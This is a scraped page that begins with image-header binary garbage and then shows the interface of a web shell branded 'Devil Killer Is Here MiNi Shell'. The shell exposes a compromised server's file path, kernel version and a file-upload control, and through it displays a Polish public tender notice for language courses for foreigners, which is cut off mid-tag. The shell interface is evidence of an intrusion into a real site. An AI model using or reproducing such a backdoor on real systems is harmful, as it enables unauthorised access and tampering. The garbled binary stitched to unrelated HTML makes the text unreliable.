JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250424/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250424/0020474901-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Organizacja i przeprowadzenie kursu języka polskiego jako obcego dla cudzoziemców (w trzech częściach). </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">WARSZAWSKIE CENTRUM POMOCY RODZINIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 014931762</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Lipińska 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">01-833</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@wcpr.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://wcpr.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Organizacja i przeprowadzenie kursu języka polskiego jako obcego dla cudzoziemców (w trzech częściach). </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a3dfa0d8-08ad-4479-a7f6-dbe68a47a1e4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00204749</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-04-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00024311/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Organizacja kursu języka polskiego jako obcego dla cudzoziemców</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://wcpr.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W niniejszym postępowaniu, komunikacja Zamawiającego z Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej przy użyciu platformy zakupowej „e-zamawiający” firmy Otwarty Rynek<br/>Elektroniczny S.A. – Marketplanet, ul. Domaniewska 49, 02-672 Warszawa, zwanej dalej „Platformą”, dostępną pod adresem: https://wcpr.ezamawiajacy.pl .<br/>Szczegółowe zasady komunikacji określone zostały w Rozdziale X SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do systemu Market Planet na subdomenie Warszawskiego Centrum Pomocy Rodzinie<br/>https://wcpr.ezamawiajacy.pl, lub https://oneplace.marketplanet.pl<br/>2) Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta.<br/>3) Rejestracja konta Wykonawcy następuje automatycznie poprzez:<br/>- utworzenie darmowego konta na stronie oneplace.marketplanet.pl za pomocą przycisku „Złóż konto za darmo”. Po wpisaniu adresu e-mail, hasła, kodu <br/>z obrazka oraz zaakceptowaniu wymaganych zgód należy użyć przycisku „Zarejestruj się”. Na podany adres email zostanie wysłana wiadomość z linkiem, za pomocą którego należy potwierdzić adres e-mail.<br/>- Po potwierdzeniu adresu e-mail należy się zalogować za pomocą przycisku „Zaloguj” w celu ukończenia procesu rejestracji.<br/>- Po zalogowaniu się należy wybrać zakładkę „Rejestracja”.<br/>- Po wypełnieniu formularza rejestracyjnego podzielonego na cztery etapy należy wysłać wniosek rejestracyjny do weryfikacji za pomocą przycisku „Wyślij wniosek”. Kod pocztowy w formularzu powinien być wpisany w formacie XX-XXX natomiast numer NIP/PESEL oraz numery telefonów jako ciąg cyfr (bez myślnika lub spacji między cyframi).<br/>- Wiadomość potwierdzająca aktywację konta zostanie przesłana na adres e-mail użyty podczas rejestracji w ciągu 6 godzin roboczych od przesłania wniosku do akceptacji.<br/>- Jeżeli niezbędna jest szybsza weryfikacja wniosku, istnieje możliwość kontaktu z infolinią wsparcia (22 257 22 23) z prośbą o przyspieszenie weryfikacji wniosku rejestracyjnego. Infolinia jest czynna w dni robocze od godziny 9:00 do 17:00.<br/>4) Komunikacja między Zamawiającym a Wykonawcami, w szczególności przekazywanie wszelkich zawiadomień, wyjaśnień oraz<br/>innych informacji, następuje przy użyciu zakładki „Korespondencja” poprzez wybranie polecenia „Dodaj dokument&#34; lub z wykorzystaniem opcji okna dialogowego „Zadaj pytanie”, w którym należy uzupełnić dane Wykonawcy, temat i treść pytania lub informacji. Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki<br/>„Korespondencja”.<br/>5) Korzystanie z Platformy eZamawiający możliwe jest pod warunkiem spełnienia przez system teleinformatyczny Usługobiorcy następujących minimalnych wymagań technicznych:<br/>a) zastosowania przeglądarki internetowej w wersji wspieranej przez producenta obsługującej TLS 1.2 z włączoną obsługą JavaScript;<br/>b) strona internetowa jest optymalizowana do rozdzielczości 1024 x 768 lub wyższej;<br/>6)W przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca winien skontaktować się z dostawcą rozwiązania teleinformatycznego Market Planet tel. +48 (22) 25 72 223 (infolinia dostępna w dni robocze, w godzinach 9.00-17.00) e-mail: oneplace@marketplanet.pl<br/>7) Dopuszczalne formaty przesyłanych danych Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w: txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar,gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.<br/>8)Wymagania techniczne i organizacyjne dot. korespondencji elektronicznej zostały szczegółowo określone w Rozdziale X SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Pani/Pana danych osobowych jest Warszawskie Centrum Pomocy Rodzinie, ul. Lipińska 2, 01-833 Warszawa, tel. 22 5997120.<br/>2. Jeśli ma Pani/Pan pytania dotyczące sposobu i zakresu przetwarzania Pani/Pana danych osobowych w zakresie działania Warszawskiego Centrum Pomocy Rodzinie, a także przysługujących Pani/Panu uprawnień, może się Pani/Pan skontaktować się z Inspektorem Ochrony Danych Osobowych w WCPR za pomocą adresu iod@wcpr.pl.<br/>3. Pani/Pana dane osobowe niezbędne do udziału w postępowaniu będą przetwarzane w celu związanym z realizacją niniejszego postępowania o udzielenie zamówienia publicznego na podstawie art. 6 ust. 1 lit. c, art. 6 ust. 1 lit. e oraz art. 10 RODO w związku z obowiązkiem prawnym ciążącym na Administratorze wynikającym z przepisów ustawy z dnia 11 września 2019 r.– Prawo zamówień,publicznych (Pzp) oraz działanie przez administratora w interesie publicznym.<br/>4. W związku z przetwarzaniem danych w celach, o których mowa w pkt 3 odbiorcami Pani/Pana danych osobowych mogą być: organy administracji publicznej lub inne podmioty upoważnione na podstawie przepisów prawa lub wykonujące zadania w interesie publicznym lub w ramach sprawowania władzy publicznej oraz podmioty świadczące usługi na rzecz Administratora, w tym usługi z zakresu informatycznego oraz w ramach przesyłanej korespondencji.<br/>5. Ze względu na jawność postępowania o udzielenie zamówienia publicznego odbiorcami Pani/Pana danych osobowych mogą będą być osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 Pzp; ograniczenie dostępu do danych może wystąpić jedynie w szczególnych przypadkach, jeśli jest to uzasadnione ochroną prywatności,<br/>interesem publicznym lub informacja stanowi tajemnicę przedsiębiorstwa.<br/>6. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy w sprawie zamówienia publicznego przekroczy 4 lata, okres przechowywania obejmuje cały czas obowiązywania umowy, a następnie w celach archiwizacyjnych zgodnie z ustawą o narodowym<br/>zasobie archiwalnym i archiwach.<br/>7. W zakresie przewidzianym przepisami prawa przysługują Pani/Panu następujące uprawnienia: prawo żądania dostępu do danych osobowych (Administrator może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji mających na celu sprecyzowanie nazwy lub daty postępowania o udzielenie zamówienia publicznego); sprostowania lub uzupełnienia danych (skorzystanie z tego prawa nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą<br/>postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu postępowania oraz jego załączników); z ograniczenia przetwarzania z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (przy czym prawo to nie ma zastosowania w odniesieniu do przechowywania w celu zapewnienia środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie może zostać zrealizowane do czasu zakończenia tego postępowania).</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu: prawo do usunięcia danych osobowych w związku z art. 17 ust. 3 lit. b, d lub e RODO; prawo do przenoszenia danych; prawo sprzeciwu wobec przetwarzania danych gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">8/2025/ZP-TP/WCPR</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiot zamówienia obejmuje :<br/>2.1. W zakresie części I. Organizację i przeprowadzenie kursu języka polskiego indywidualnego i grupowego stacjonarnego i on-line jako obcego dla cudzoziemców z ochroną międzynarodową w Polsce realizujących Indywidualne Programy Integracji w Warszawskim Centrum Pomocy Rodzinie:<br/>1)	Kurs będzie realizowany stacjonarnie w formie zajęć grupowych stacjonarnych, zajęć grupowych on-line oraz indywidualnych stacjonarnych.<br/>2)	Odbiorcami kursu będą osoby pełnoletnie wskazane przez Zamawiającego – cudzoziemcy, którzy realizują w Warszawskim Centrum Pomocy Rodzinie Indywidualne Programy Integracji.<br/>3)	Przed rozpoczęciem zajęć dydaktycznych Wykonawca ustali dla każdego uczestnika poziom znajomości języka polskiego oraz dyspozycyjność w zakresie odpowiadających uczestnikowi dni i godzin zajęć.<br/>4)	Po stronie Zamawiającego będzie pisemne skierowanie potencjalnego uczestnika kursu do Wykonawcy w celu przeprowadzenia rekrutacji poziomującej.<br/>5)	Po stronie Wykonawcy będzie odesłanie Zamawiającemu wypełnionego Skierowania uczestnika kursu.<br/>6)	Osoba skierowana przez Zamawiającego do udziału w kursie, stawi się z odpowiednim skierowaniem otrzymanym przez Zamawiającego w miejscu wyznaczonym przez Wykonawcę. W skierowaniu zawarte będą informację o dyspozycyjności kursanta. Skierowanie zostanie zwrócone do Zamawiającego po uzupełnieniu informacji przez Wykonawcę o dacie przeprowadzenia poziomowania znajomości językowej, przydzieleniu do grupy, dacie rozpoczęcia kursu, w terminie 7 dniu po zakończonej rekrutacji.<br/>7)	Po stronie Wykonawcy będzie przeprowadzenie rekrutacji w miejscu wskazanym przez Wykonawcę, poziomującej znajomość językową uczestników: rekrutacja będzie przeprowadzana w godzinach: 8:00-12:00 oraz 15:00 - 20:00 od poniedziałku do piątku oraz 9:00-20:00 w soboty.<br/>8)	Wykonawca na pierwszych zajęciach stacjonarnych zapewni każdemu uczestnikowi materiały piśmiennicze (teczka, zeszyt, długopis, ołówek) oraz materiały dydaktyczne niezbędne do właściwego przeprowadzenia zajęć. Wszelkie materiały piśmiennicze oraz dydaktyczne zostaną przekazane uczestnikom na własność.<br/>9)	W ramach realizacji zamówienia Wykonawca będzie prowadzić następującą dokumentację zgodną ze wzorem określonym przez Zamawiającego:<br/>- lista obecności, <br/>- sprawozdanie z realizacji zamówienia.<br/>10)	Wykonawca będzie zobowiązany do dokumentowania frekwencji każdego uczestnika zajęć, bieżącego informowania o nieobecnościach jak też raportowania o postępach w nauce każdego z uczestników.<br/>11)	Po zakończeniu realizacji zajęć Wykonawca wystawi uczestnikom certyfikaty ukończenia kursu na odpowiednim poziomie.<br/>12)	Po zakończeniu kursu Wykonawca sporządzi raporty o postępach w nauce każdego z uczestników, które powinien dostarczyć do Zamawiającego w ciągu 14 dni po zakończonym kursie.<br/>13)	Raporty o postępach w nauce będą sporządzane w wersji papierowej, oddzielnie dla każdego uczestnika, podpisane przez lektora prowadzącego zajęcia, oraz będą uwzględniać co najmniej takie informacje jak: umiejętność posługiwania się językiem polskim w mowie i piśmie, zaangażowanie uczestnika oraz przygotowanie do zajęć, indywidualne uwagi.<br/>14)	Zajęcia prowadzone będą pomocniczo w języku angielskim lub rosyjskim w zależności od poziomu językowego lub potrzeb uczestników.<br/>15)	Realizacja umowy będzie rozliczana po każdym zakończonym miesiącu kalendarzowym.<br/>16)	Zamawiający zapłaci jedynie za faktycznie zrealizowane godziny zajęć dydaktycznych.<br/>17)	Przez godzinę zajęć należy rozumieć 45 minut.<br/>18)	Szczegółowy opis przedmiotu zamówienia zawarty jest w Załączniku nr 1a do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80580000-3 - Oferowanie kursów językowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80000000-4 - Usługi edukacyjne i szkoleniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-12</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie lektorów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W zakresie części II. Kurs języka polskiego jako obcego dla dorosłych cudzoziemców klientów Warszawskiego Centrum Pomocy Rodzinie, którzy nie są objęci pomocą w ramach Indywidualnego Programu Integracji.<br/>1)	Kursy będą realizowane w formie zajęć grupowych stacjonarnych.<br/>2)	Miejscem organizacji kursu będzie lokal pozostający w dyspozycji Wykonawcy przystosowany i dostępny dla osób z niepełnosprawnością. <br/>3)	Kursant zgłosi się do Wykonawcy kursu ze Skierowaniem od Zamawiającego, które po wypełnieniu wszystkich pól informacyjnych Wykonawca przekaże do Zamawiającego.<br/>4)	Wykonawca przed rozpoczęciem zajęć dydaktycznych ustali poziom znajomości języka polskiego oraz dyspozycyjność w zakresie odpowiadających uczestnikowi dni i godzin zajęć (spotkań), w dalszej części zwane rekrutacją. Nastąpi to nie później niż w ciągu 6 dni od daty zgłoszenia się kursanta ze skierowaniem od Zamawiającego. <br/>5)	Wyniki rekrutacji Wykonawca przekaże Zamawiającemu zwracając wypełniony oryginał Skierowania w ciągu 6 dni od przeprowadzenia poziomowania i przydzielenia kursanta do grupy kursu. Kopię skierowania Wykonawca przekaże kursantowi.<br/>6)	Wykonawca przekaże do Zamawiającego również Skierowania niezakwalifikowanych na kursu Klientów z podaniem przyczyny. Utworzy też listę Klientów rezerwowych.<br/>7)	Indywidualne przypadki Klientów będą konsultowane pomiędzy Wykonawcą, a Zamawiającym. <br/>8)	Rekrutacja będzie przeprowadzana stacjonarnie w siedzibie Wykonawcy w formie ustnej i pisemnej w godzinach: 8:00-12:00 w 20% rekrutowanych oraz 15:00-20:00 w 50% rekrutowanych od poniedziałku do piątku oraz w godzinach 9:00-20:00 w soboty 30% rekrutowanych.<br/>9)	Wykonawca dopasuje grupę uczestników kursu pod względem przynależności do natywnej rodziny językowej kursantów.<br/>10)	Wykonawca na pierwszych zajęciach zapewni każdemu uczestnikowi materiały piśmiennicze oraz materiały dydaktyczne niezbędne do właściwego przeprowadzenia zajęć. Wszelkie materiały piśmiennicze oraz dydaktyczne zostaną przekazane uczestnikom na własność. <br/>11)	Łączna liczba godzin kursów grupowych stacjonarnych: 840h (14 grup x 20 spotkań x 3 godziny).<br/>12)	Liczba prowadzonych grup: 14 grup.<br/>13)	Czas jednego spotkania dla grupy: 3 godziny lekcyjne (1 godz. = 45min.) <br/>14)	Liczba uczestników w jednej grupie: minimalna 6 osób, maksymalna 8 osób.<br/>15)	Łączna liczba spotkań dla jednej grupy: 20 spotkań (60 godzin lekcyjnych) zgodnie z harmonogramem.<br/>16)	Wykonawca będzie zobowiązany do dokumentowania frekwencji każdego uczestnika zajęć, bieżącego informowania o nieobecnościach. <br/>17)	Po zakończeniu realizacji zajęć Wykonawca wystawi uczestnikom certyfikaty ukończenia kursu na odpowiednim poziomie.<br/>18)	Zajęcia prowadzone będą pomocniczo w języku angielskim lub rosyjskim w zależności od poziomu językowego lub potrzeb uczestników.<br/>19)	Realizacja umowy będzie rozliczana po każdym zakończonym miesiącu kalendarzowym.<br/>20)	Zamawiający zapłaci jedynie za faktycznie zrealizowane godziny zajęć dydaktycznych.<br/>21)	Szczegółowy opis przedmiotu zamówienia zawarty jest w Załączniku nr 1b do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80580000-3 - Oferowanie kursów językowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80000000-4 - Usługi edukacyjne i szkoleniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-12</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 